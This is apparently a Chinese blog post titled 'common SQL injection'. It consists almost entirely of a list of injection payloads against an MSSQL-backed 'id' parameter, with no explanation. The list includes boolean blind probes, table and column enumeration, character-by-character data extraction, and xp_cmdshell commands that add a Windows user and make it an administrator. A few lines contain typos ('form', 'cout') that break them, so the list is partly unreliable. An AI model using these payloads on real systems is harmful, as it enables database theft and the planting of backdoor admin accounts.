id=1 and 1=1 id=1 and 1=2 id=1 and db_name()>0 id=1 and user>0 id=1 and (select count(*) from xx)>0 id=1 and (select cout(xxx) form xx)>0 id=1 and (select top 1 len(xxx) from xx)>0 ->1,2,3...... id=1 and (select top 1 asc(mid(xxx,1,1)) form xx)>0 -> 1-128 id=1;exec master..xp_cmdshell "net user username passwd /add"-- id=1;exec master..xp_cmdshell "net localgroup username administrators /add"-- id=1 and (select top 1 username from sysobjects where xtype=nchar(85) and status>0)>0 id=1 and (select top 1 col_name(object_id('xxx'),1) form sysobjects)>0
常见SQL注入
原创rangercyh 博主文章分类:Coding Life ©著作权
©著作权归作者所有:来自51CTO博客作者rangercyh的原创作品,谢绝转载,否则将追究法律责任
上一篇:游戏设计中的道德
下一篇:LZW算法的简单代码

提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
常见WEB应用漏洞-SQL注入
SQL注入
sql语句 sql 注入 -
常见的sql注入类型闭合及符号
不是少年守不住初心,而是岁月慌了人心。。。---- 网易云热评一、数字型注入1、存在注入的urlwww.baidu.con/ai
网络安全 sql注入 数据库查询 php -
常见的SQL注入绕过身份验证
常见的SQL注入绕过身份验证
SQL注入绕过 网络安全